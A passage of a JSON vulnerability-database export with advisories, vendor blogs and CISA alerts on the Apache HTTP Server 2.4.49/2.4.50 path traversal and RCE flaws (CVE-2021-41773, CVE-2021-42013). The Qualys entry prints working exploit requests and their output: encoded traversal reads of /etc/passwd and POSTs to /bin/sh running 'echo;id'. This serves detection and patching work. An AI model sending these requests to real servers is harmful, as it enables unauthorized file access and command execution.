"href": "https://attackerkb.com/topics/WzgBXAx8tH/apache-httpd-2-4-49-2-4-50", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-19T17:12:43", "description": "It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \u201crequire all denied\u201d, these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions.\n\n<https://blog.talosintelligence.com/2021/10/apache-vuln-threat-advisory.html>\n\n \n**Recent assessments:** \n \n**noraj** at March 31, 2022 6:44pm UTC reported:\n\nQualys says:\n\n> CVE-2021-42013 was introduced as the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient as it did not cover double URL encoding, therefore the vulnerable configurations remained the same, but payload used in 2.4.49 was double URL encoded in 2.4.50 to administer the same path traversal and remote code execution attack.\n> \n> The attack in 2.4.49 initially encoded the second dot (.) 
to %2e and the same was double URL encoded into %%32%65 for version 2.4.50\n\nAssessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-08T00:00:00", "type": "attackerkb", "title": "CVE-2021-42013: Path Traversal and Remote Code Execution in Apache HTTP Server 2.4.49 and 2.4.50 (incomplete fix of CVE-2021-41773)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-08T00:00:00", "id": "AKB:BD8195D2-FB3B-4F9B-82C5-32F5CBDEFF70", "href": "https://attackerkb.com/topics/OClg2d2nSp/cve-2021-42013-path-traversal-and-remote-code-execution-in-apache-http-server-2-4-49-and-2-4-50-incomplete-fix-of-cve-2021-41773", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:31:46", "description": "A directory traversal vulnerability exists in Apache HTTP Server. 
Successful exploitation of this vulnerability could allow an attacker to access arbitrary files on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-06T00:00:00", "type": "checkpoint_advisories", "title": "Apache HTTP Server Directory Traversal (CVE-2021-41773; CVE-2021-42013)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-18T00:00:00", "id": "CPAI-2021-0749", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "jvn": [{"lastseen": "2021-12-28T23:20:08", "description": "Apache HTTP Server provided by The Apache Software Foundation contains a directory traversal vulnerability (CWE-22).\n\n ## Impact\n\nA remote attacker may access files placed outside of the document root that are not protected by \"require all denied\". 
\nMoreover, if CGI scripts are enabled, arbitrary code may be executed.\n\n ## Solution\n\n**Update the Software** \nUpdate to the latest version according to the information provided by the developer.\n\n ## Products Affected\n\n * Apache HTTP Server 2.4.49 and 2.4.50\nAccording to the developer, the issue is caused by an insufficient fix for CVE-2021-41773. \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-08T00:00:00", "type": "jvn", "title": "JVN#51106450: Apache HTTP Server vulnerable to directory traversal", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-08T00:00:00", "id": "JVN:51106450", "href": "http://jvn.jp/en/jp/JVN51106450/index.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "archlinux": [{"lastseen": "2021-11-27T06:38:53", "description": "Arch Linux Security Advisory ASA-202110-1\n=========================================\n\nSeverity: Critical\nDate : 2021-10-21\nCVE-ID : CVE-2021-42013\nPackage : apache\nType : directory traversal\nRemote : Yes\nLink : 
https://security.archlinux.org/AVG-2450\n\nSummary\n=======\n\nThe package apache before version 2.4.51-1 is vulnerable to directory\ntraversal.\n\nResolution\n==========\n\nUpgrade to 2.4.51-1.\n\n# pacman -Syu \"apache>=2.4.51-1\"\n\nThe problem has been fixed upstream in version 2.4.51.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\nIt was found that the fix for CVE-2021-41773 in Apache HTTP Server\n2.4.50 was insufficient. An attacker could use a path traversal attack\nto map URLs to files outside the directories configured by Alias-like\ndirectives. If files outside of these directories are not protected by\nthe usual default configuration \"require all denied\", these requests\ncan succeed. If CGI scripts are also enabled for these aliased paths,\nthis could allow for remote code execution. This issue only affects\nApache 2.4.49 and Apache 2.4.50 and not earlier versions.\n\nImpact\n======\n\nA remote attacker could trick the HTTP server into executing arbitrary\nexecutables in its file system through path traversal.\n\nReferences\n==========\n\nhttps://httpd.apache.org/security/vulnerabilities_24.html#CVE-2021-42013\nhttps://twitter.com/roman_soft/status/1446252280597078024\nhttps://github.com/icing/blog/blob/main/httpd-2.4.50.md\nhttps://svn.apache.org/viewvc?view=revision&revision=1893971\nhttps://security.archlinux.org/CVE-2021-42013", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-21T00:00:00", "type": "archlinux", "title": "[ASA-202110-1] apache: directory traversal", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", 
"exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-21T00:00:00", "id": "ASA-202110-1", "href": "https://security.archlinux.org/ASA-202110-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "impervablog": [{"lastseen": "2021-10-26T20:35:58", "description": "In late September of 2021, a path traversal and file disclosure vulnerability was disclosed and reported as CVE-2021-41773 in Apache HTTP Server version 2.4.29. Both Windows and Linux servers are affected.\n\nThis vulnerability, which occurs via remote code execution (RCE), exposes a path traversal bug and allows attackers to access and read arbitrary files on the server, including sensitive system files, source code, and more. This unauthorized access could not only leak confidential user data, but could provide the information needed to plan more additional zero-day or ransomware attacks in the future and lead to a full system compromise.\n\nOn October 4th, just days after it was originally reported, Apache released a fix with an update to 2.4.50, and urged users to deploy this patch. However upon further investigation, this patch was found to be insufficient resulting in an additional patch bumping the version number to 2.4.51 on October 7th (CVE-2021-42013). 
It is unclear whether or not the new patch has fully corrected the vulnerability.\n\nLuckily, enterprises that have [RASP protections](<https://www.imperva.com/products/runtime-application-self-protection-rasp/>) installed on their servers already have protections available that prevent Path Traversal attacks, thereby safeguarding systems from vulnerabilities like CVE-2021-42013 and others like it.\n\nTo verify this protection is enabled in the suite of [RASP security protections](<https://www.imperva.com/products/runtime-application-self-protection-rasp/>), simply navigate to the RASP Management Console and select the desired configuration file. Scroll through the various security protections until reaching the Path Traversal module, then update any settings as desired to adjust the security levels. The updated configuration file can be copied onto the server, and updated protections will be in effect within 60 seconds.\n\nRASP can also be easily installed and configured on additional devices and servers as needed to offer full protection against these vulnerabilities and hackers, as Apache recognizes these vulnerabilities are being actively exploited by bad actors.\n\nFor more information, please contact RASP Technical Support at [support@rasp.imperva.com](<mailto:support@rasp.imperva.com>) or ask for a RASP demo via <https://docs.imperva.com/bundle/rasp-overview/page/73763.htm>\n\nThe post [How RASP Protects Apache Servers from zero-day Path Traversal Attacks (CVE-2021-41773)](<https://www.imperva.com/blog/how-rasp-protects-apache-servers-from-zero-day-path-traversal-attacks-cve-2021-41773/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "cvss3": {}, "published": "2021-10-26T19:35:24", "type": "impervablog", "title": "How RASP Protects Apache Servers from zero-day Path Traversal Attacks (CVE-2021-41773)", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-26T19:35:24", "id": 
"IMPERVABLOG:FEBE35B3CF79AFD5E057AF4D43E9C08F", "href": "https://www.imperva.com/blog/how-rasp-protects-apache-servers-from-zero-day-path-traversal-attacks-cve-2021-41773/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "qualysblog": [{"lastseen": "2021-11-26T18:36:54", "description": "On October 4, 2021, Apache HTTP Server Project released Security advisory on a Path traversal and File disclosure vulnerability in Apache HTTP Server 2.4.49 and 2.4.50 tracked as CVE-2021-41773 and CVE-2021-42013. In the advisory, Apache also highlighted \u201cthe issue is known to be exploited in the wild\u201d and later it was identified that the vulnerability can be abused to perform remote code execution. For exploiting both the vulnerabilities Apache HTTP server must be running in non-default configuration.\n\nAs the vulnerabilities are configuration dependent, checking the version of Apache web server is not enough to identify vulnerable servers. With both the CVEs being actively exploited, [Qualys Web Application Scanning](<https://www.qualys.com/apps/web-app-scanning/>) has released **QID 150372, 150373, 150374** which sends specially crafted HTTP request to the target server to determine if it is exploitable. 
Once successfully detected, users can remediate the vulnerabilities by upgrading to Apache HTTP Sever 2.4.51 or greater.\n\n### About CVE-2021-41773\n\nAccording to **CVE-2021-41773**, Apache HTTP Server 2.4.49 is vulnerable to Path Traversal and Remote Code execution attacks.\n\n#### Path Traversal Analysis\n\nThe path traversal vulnerability was introduced due to the new code change added for path normalization i.e., for URL paths to remove unwanted or dangerous parts from the pathname, but it was inadequate to detect different techniques of encoding the path traversal characters "dot-dot-slash (../)"\n\nTo prevent path traversal attacks, the normalization function which is responsible to resolve URL-encoded values from the requested URI, resolved Unicode values one at a time. Hence when URL encoding the second dot as `%2e`, the logic fails to recognize `%2e` as dot thereby not decoding it, this converts the characters `../` to `.%2e/` and bypasses the check.\n\nAlong with Path traversal check bypass, for an Apache HTTP server to be vulnerable, the HTTP Server configuration should either contain the [directory directive](<https://httpd.apache.org/docs/2.4/mod/core.html#directory>) for entire server\u2019s filesystem as `Require all granted` or the directory directive should be completely missing from the configuration file.\n\n##### Vulnerable Configuration:\n \n \n <Directory />\n Require all granted\n </Directory>\n \n\nTherefore, bypassing the dot-dot check as `.%2e` and chaining it with misconfigured directory directive allows an attacker to read arbitrary files such as `passwd` from the vulnerable server file system.\n\n##### Exploitation: Path Traversal\n\nRequest:\n \n \n GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1\n Host: 127.0.0.1:8080\n User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\n Accept-Language: en-US,en;q=0.5\n 
Accept-Encoding: gzip, deflate\n Connection: close\n Upgrade-Insecure-Requests: 1\n\nResponse:\n \n \n HTTP/1.1 200 OK\n Date: Mon, 18 Oct 2021 08:13:02 GMT\n Server: Apache/2.4.49 (Unix)\n Last-Modified: Mon, 27 Sep 2021 00:00:00 GMT\n ETag: \"39e-5cceec7356000\"\n Accept-Ranges: bytes\n Content-Length: 926\n Connection: close\n \n root:x:0:0:root:/root:/bin/bash\n daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n bin:x:2:2:bin:/bin:/usr/sbin/nologin\n sys:x:3:3:sys:/dev:/usr/sbin/nologin\n sync:x:4:65534:sync:/bin:/bin/sync\n games:x:5:60:games:/usr/games:/usr/sbin/nologin\n man:x:6:12:man:/var/cache/man:/usr/sbin/nologin\n lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\n mail:x:8:8:mail:/var/mail:/usr/sbin/nologin\n news:x:9:9:news:/var/spool/news:/usr/sbin/nologin\n uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\n proxy:x:13:13:proxy:/bin:/usr/sbin/nologin\n www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n backup:x:34:34:backup:/var/backups:/usr/sbin/nologin\n list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\n irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin\n gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\n nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n _apt:x:100:65534::/nonexistent:/usr/sbin/nologin\n\nPlease note that the default configuration of Apache HTTP server has the entire filesystem directory directive configured as `Require all denied` and hence is not vulnerable.\n\n#### Remote Code Execution Analysis\n\nWhile **CVE-2021-41773** was initially documented as Path traversal and File disclosure vulnerability additional research concluded that the vulnerability can be further exploited to conduct remote code execution when [mod_cgi](<https://httpd.apache.org/docs/current/mod/mod_cgi.html>) module is enabled on the Apache HTTP server, this allows an attacker to leverage the path traversal vulnerability and call any binary on the system using HTTP POST requests.\n\n##### Configuration 
to enable mod_cgi module:\n \n \n <IfModule !mpm_prefork_module>\n LoadModule cgid_module modules/mod_cgid.so\n </IfModule>\n \n\nBy default the `mod_cgi` module is disabled on Apache HTTP server by commenting the above line in the configuration file. Hence, when mod_cgi is enabled and \u201cRequire all granted\u201d config is applied to the filesystem directory directive then an attacker can remotely execute commands on the Apache server. \n\n##### Exploitation: Remote Code Execution\n\nRequest:\n \n \n POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1\n Host: 127.0.0.1:8080\n User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0\n Accept: */*\n Content-Length: 7\n Content-Type: application/x-www-form-urlencoded\n Connection: close\n \n echo;id\n\nResponse:\n \n \n HTTP/1.1 200 OK\n Date: Mon, 18 Oct 2021 09:58:23 GMT\n Server: Apache/2.4.49 (Unix)\n Connection: close\n Content-Length: 45\n \n uid=1(daemon) gid=1(daemon) groups=1(daemon)\n\nLooking at the HTTP POST request for RCE, we can understand `/bin/sh` is the system binary that executes the payload `echo;id` and print the output of `id` command in response.\n\n### About CVE-2021-42013\n\n**CVE-2021-42013** was introduced as the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient as it did not cover double URL encoding, therefore the vulnerable configurations remained the same, but payload used in 2.4.49 was double URL encoded in 2.4.50 to administer the same path traversal and remote code execution attack.\n\nThe attack in 2.4.49 initially encoded the second dot (.) 
to `%2e` and the same was double URL encoded into `%%32%65` for version 2.4.50\n\n##### **Encoding Analysis**\n\nConversion: dot \u2192 `%2e` \u2192 `%%32%65`\n\n * 2 is encoded to %32\n * e is encoded to %65\n * And original `%` left as it is\n\nThus a `dot` is equivalent to `%%32%65` which eventually converts `../` in double URL encode format as `%%32%65%%32%65/`\n\n##### Exploitation: Path Traversal\n\nRequest:\n \n \n GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1\n Host: 127.0.0.1:8080\n User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Connection: close\n Upgrade-Insecure-Requests: 1\n\nResponse:\n \n \n HTTP/1.1 200 OK\n Date: Mon, 18 Oct 2021 10:16:51 GMT\n Server: Apache/2.4.50 (Unix)\n Last-Modified: Mon, 27 Sep 2021 00:00:00 GMT\n ETag: \"39e-5cceec7356000\"\n Accept-Ranges: bytes\n Content-Length: 926\n Connection: close\n \n \n root:x:0:0:root:/root:/bin/bash\n daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n bin:x:2:2:bin:/bin:/usr/sbin/nologin\n sys:x:3:3:sys:/dev:/usr/sbin/nologin\n sync:x:4:65534:sync:/bin:/bin/sync\n games:x:5:60:games:/usr/games:/usr/sbin/nologin\n man:x:6:12:man:/var/cache/man:/usr/sbin/nologin\n lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\n mail:x:8:8:mail:/var/mail:/usr/sbin/nologin\n news:x:9:9:news:/var/spool/news:/usr/sbin/nologin\n uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\n proxy:x:13:13:proxy:/bin:/usr/sbin/nologin\n www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n backup:x:34:34:backup:/var/backups:/usr/sbin/nologin\n list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\n irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin\n gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\n 
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n _apt:x:100:65534::/nonexistent:/usr/sbin/nologin\n\n##### Exploitation: Remote Code Execution\n\nRequest:\n \n \n POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1\n Host: 127.0.0.1:8080\n User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Connection: close\n Upgrade-Insecure-Requests: 1\n Content-Type: application/x-www-form-urlencoded\n Content-Length: 7\n \n echo;id\n\nResponse:\n \n \n HTTP/1.1 200 OK\n Date: Mon, 18 Oct 2021 10:42:40 GMT\n Server: Apache/2.4.50 (Unix)\n Connection: close\n Content-Length: 45\n \n uid=1(daemon) gid=1(daemon) groups=1(daemon)\n\n### Detecting the Vulnerabilities with Qualys WAS\n\nCustomers can detect these vulnerabilities with Qualys Web Application Scanning using the following QIDs:\n\n * 150372: Apache HTTP Server Path Traversal (CVE-2021-41773)\n * 150373: Apache HTTP Server Remote Code Execution (CVE-2021-41773)\n * 150374: Apache HTTP Server Multiple Vulnerabilities (CVE-2021-42013)\n\n\nQID 150372 \u2013 Apache HTTP Server Path Traversal (CVE-2021-41773)\n\n### Report\n\nOnce the vulnerability is successfully detected by Qualys WAS, users shall see similar kind of results for QID 150372 in the vulnerability scan report:\n\n\n\n### Solution\n\nOrganizations using Apache HTTP Server 2.4.49 or 2.4.50 are advised to upgrade to HTTP Server 2.5.51 or later version to remediate CVE-2021-41773 & CVE-2021-42013, more information can be referred at [Apache Security advisory](<https://httpd.apache.org/security/vulnerabilities_24.html>).\n\nFor maintaining best security practices, Qualys also advises users to ensure the following:\n\n * `mod_cgi` module is disabled by default unless the business requires it.\n 
 * filesystem directory directive to be updated with `Require all denied` as shown below:\n \n \n <Directory />\n Require all denied\n </Directory>\n \n\n### Credits\n\n**Apache Security advisory:**\n\n<https://httpd.apache.org/security/vulnerabilities_24.html>\n\n**CVE Details:**\n\n<https://nvd.nist.gov/vuln/detail/CVE-2021-41773> \n<https://nvd.nist.gov/vuln/detail/CVE-2021-42013>\n\n**Credits for the vulnerability discovery go to:**\n\n * Ash Daulton along with the cPanel Security Team\n * Juan Escobar from Dreamlab Technologies\n * Fernando Mu\u00f1oz from NULL Life CTF Team\n * Shungo Kumasaka and Nattapon Jongcharoen\n\n**References:**\n\n * <https://twitter.com/ptswarm/status/1445376079548624899>\n * <https://twitter.com/hackerfantastic/status/1445529822071967745>\n * <https://attackerkb.com/topics/1RltOPCYqE/cve-2021-41773/rapid7-analysis?referrer=blog>\n\n### Contributor\n\n**Jyoti Raval**, Lead Web Application Security Analyst, Qualys", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-28T06:22:22", "type": "qualysblog", "title": "Apache HTTP Server Path Traversal & Remote Code Execution (CVE-2021-41773 & CVE-2021-42013)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, 
"acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-28T06:22:22", "id": "QUALYSBLOG:78A056D339E07378EFC349E5ACA8EC30", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa": [{"lastseen": "2021-11-26T18:26:07", "description": "On October 7, 2021, the Apache Software Foundation released [Apache HTTP Server version 2.4.51](<https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2021-42013>) to address Path Traversal and Remote Code Execution vulnerabilities (CVE-2021-41773, CVE-2021-42013) in Apache HTTP Server 2.4.49 and 2.4.50. These vulnerabilities have been exploited in the wild. \n\nCISA is also seeing ongoing scanning of vulnerable systems, which is expected to accelerate, likely leading to exploitation. CISA urges organizations to [patch](<https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2021-42013>) immediately if they haven\u2019t already\u2014this cannot wait until after the holiday weekend.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/10/07/apache-releases-http-server-version-2451-address-vulnerabilities>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": 
"2021-10-07T00:00:00", "type": "cisa", "title": "Apache Releases HTTP Server version 2.4.51 to Address Vulnerabilities Under Exploitation ", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-07T00:00:00", "id": "CISA:76FE595B1B89D06301E16CB8087D39BD", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/10/07/apache-releases-http-server-version-2451-address-vulnerabilities", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-26T18:21:13", "description": "_(Updated October 7, 2021)_\n\nApache has released additional fixes for CVE-2021-41773, which is tracked as [CVE-2021-42013](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42013>). For more information see the [Apache vulnerabilities page](<https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2021-42013>). \n\n_(Originally published October 6, 2021)_\n\nThe Apache Software Foundation has released Apache HTTP Server version 2.4.50 to address two vulnerabilities. An attacker could exploit these vulnerabilities to take control of an affected system. One vulnerability, [CVE-2021-41773](<https://www.cve.org/CVERecord?id=CVE-2021-41773>), has been exploited in the wild. 
\n \nThe Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the [Apache HTTP Server 2.4.50 vulnerabilities page](<https://httpd.apache.org/>) and apply the necessary update.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/10/06/apache-releases-security-update-apache-http-server>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-06T00:00:00", "type": "cisa", "title": "Apache Releases Security Update for Apache HTTP Server", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-07T00:00:00", "id": "CISA:78B08801DAA7C3B8A2D34A5790730C76", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/10/06/apache-releases-security-update-apache-http-server", "cvss": {"score": 7.5, "vector": 
